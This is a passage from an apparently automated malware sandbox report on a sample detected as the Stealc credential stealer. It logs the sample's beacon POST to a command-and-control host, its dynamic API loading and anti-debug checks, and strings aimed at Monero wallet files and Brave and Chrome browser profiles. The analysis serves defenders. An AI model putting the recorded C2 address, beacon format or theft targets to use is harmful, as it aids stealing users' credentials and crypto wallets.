67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f [TRUNCATED] Data Ascii: 200c.pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com
Oct 14, 2024 01:53:26.766781092 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHIJDHIDBGHJKECBFIID--
Oct 14, 2024 01:53:27.492866039 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	19:53:06
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x810000
File size:	1'856'512 bytes
MD5 hash:	BB5A205420D330A463AF2ACCF2FADEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2130002138.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 00829860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00EF0558), ref: 008298A1
GetProcAddress.KERNEL32(75900000,00EF0660), ref: 008298BA
GetProcAddress.KERNEL32(75900000,00EF0768), ref: 008298D2
GetProcAddress.KERNEL32(75900000,00EF0720), ref: 008298EA
GetProcAddress.KERNEL32(75900000,00EF06F0), ref: 00829903
GetProcAddress.KERNEL32(75900000,00EF8900), ref: 0082991B
GetProcAddress.KERNEL32(75900000,00EE6360), ref: 00829933
GetProcAddress.KERNEL32(75900000,00EE6560), ref: 0082994C
GetProcAddress.KERNEL32(75900000,00EF0678), ref: 00829964
GetProcAddress.KERNEL32(75900000,00EF0780), ref: 0082997C
GetProcAddress.KERNEL32(75900000,00EF0798), ref: 00829995
GetProcAddress.KERNEL32(75900000,00EF07B0), ref: 008299AD
GetProcAddress.KERNEL32(75900000,00EE62C0), ref: 008299C5
GetProcAddress.KERNEL32(75900000,00EF0810), ref: 008299DE
GetProcAddress.KERNEL32(75900000,00EF0828), ref: 008299F6
GetProcAddress.KERNEL32(75900000,00EE63A0), ref: 00829A0E
GetProcAddress.KERNEL32(75900000,00EF0570), ref: 00829A27
GetProcAddress.KERNEL32(75900000,00EF0888), ref: 00829A3F
GetProcAddress.KERNEL32(75900000,00EE64C0), ref: 00829A57
GetProcAddress.KERNEL32(75900000,00EF0870), ref: 00829A70
GetProcAddress.KERNEL32(75900000,00EE65C0), ref: 00829A88
LoadLibraryA.KERNEL32(00EF08D0,?,00826A00), ref: 00829A9A
LoadLibraryA.KERNEL32(00EF0918,?,00826A00), ref: 00829AAB
LoadLibraryA.KERNEL32(00EF08E8,?,00826A00), ref: 00829ABD
LoadLibraryA.KERNEL32(00EF0858,?,00826A00), ref: 00829ACF
LoadLibraryA.KERNEL32(00EF08A0,?,00826A00), ref: 00829AE0
GetProcAddress.KERNEL32(75070000,00EF08B8), ref: 00829B02
GetProcAddress.KERNEL32(75FD0000,00EF0900), ref: 00829B23
GetProcAddress.KERNEL32(75FD0000,00EF8C28), ref: 00829B3B
GetProcAddress.KERNEL32(75A50000,00EF8EC8), ref: 00829B5D
GetProcAddress.KERNEL32(74E50000,00EE6460), ref: 00829B7E
GetProcAddress.KERNEL32(76E80000,00EF8950), ref: 00829B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00829BB6

Strings

`e, xrefs: 0082993E
`c, xrefs: 00829926
`d, xrefs: 00829B71
NtQueryInformationProcess, xrefs: 00829BAA

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$`c$`d$`e
API String ID: 2238633743-3731989178
Opcode ID: 75c1917ab53ac7bec024b45710bcd184b41ff84a0cf86be3787827f82e0e3f3c
Instruction ID: c7b4d781b860e6e65fe729c9fc0de31bd825c4513b6540cad7c01dd9e39b9212
Opcode Fuzzy Hash: 75c1917ab53ac7bec024b45710bcd184b41ff84a0cf86be3787827f82e0e3f3c
Instruction Fuzzy Hash: A1A1E9B6710344AFD344EFE8ED98A663BF9F76C303714871AA605C3264D6399843DB52

Function 008145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0081460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0081479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008145DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008145F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008145E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008146AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008145D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008145C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00814622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0081474F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: d574a463d99e057d85e27a263e60abf6e6249050a8e01b56b0273b5ad9360cd7
Instruction ID: 63877c8239ad113e0c4c0ffa30eda0374203927ec83e1de7768a867f11025016
Opcode Fuzzy Hash: d574a463d99e057d85e27a263e60abf6e6249050a8e01b56b0273b5ad9360cd7
Instruction Fuzzy Hash: 8C41F2607C76046AEE3AB7E4984EFDF7656FF8A7C4F506480EC3092382CBE8650449E1

Function 00824910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0082492C
FindFirstFileA.KERNEL32(?,?), ref: 00824943
StrCmpCA.SHLWAPI(?,00830FDC), ref: 00824971
StrCmpCA.SHLWAPI(?,00830FE0), ref: 00824987
FindNextFileA.KERNEL32(000000FF,?), ref: 00824B7D
FindClose.KERNEL32(000000FF), ref: 00824B92

Strings

%s\%s, xrefs: 008249A4
`, xrefs: 00824A3D
%s\%s, xrefs: 008249FB
%s\*, xrefs: 00824920

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$`
API String ID: 180737720-39356998
Opcode ID: 8d52b6203a39022cf4c9faecb9a2c6cbf070c0cfb6f2d5c60f982258940bc35e
Instruction ID: 3ed1ccb23da575622ab956cd532e728ebaccb01b198db07a029b8d1e1b3bf09f
Opcode Fuzzy Hash: 8d52b6203a39022cf4c9faecb9a2c6cbf070c0cfb6f2d5c60f982258940bc35e
Instruction Fuzzy Hash: 8F6136B1500218ABCB24EBE4EC45EEA777CFB58701F048698B609D6141EB759B85CFA2

Function 0081BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

FindFirstFileA.KERNEL32(00000000,?,00830B32,00830B2B,00000000,?,?,?,008313F4,00830B2A), ref: 0081BEF5
StrCmpCA.SHLWAPI(?,008313F8), ref: 0081BF4D
StrCmpCA.SHLWAPI(?,008313FC), ref: 0081BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0081C7BF
FindClose.KERNEL32(000000FF), ref: 0081C7D1

Strings

\Brave\Preferences, xrefs: 0081C1DB
Preferences, xrefs: 0081C11E
Brave, xrefs: 0081C102
Google Chrome, xrefs: 0081C634

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
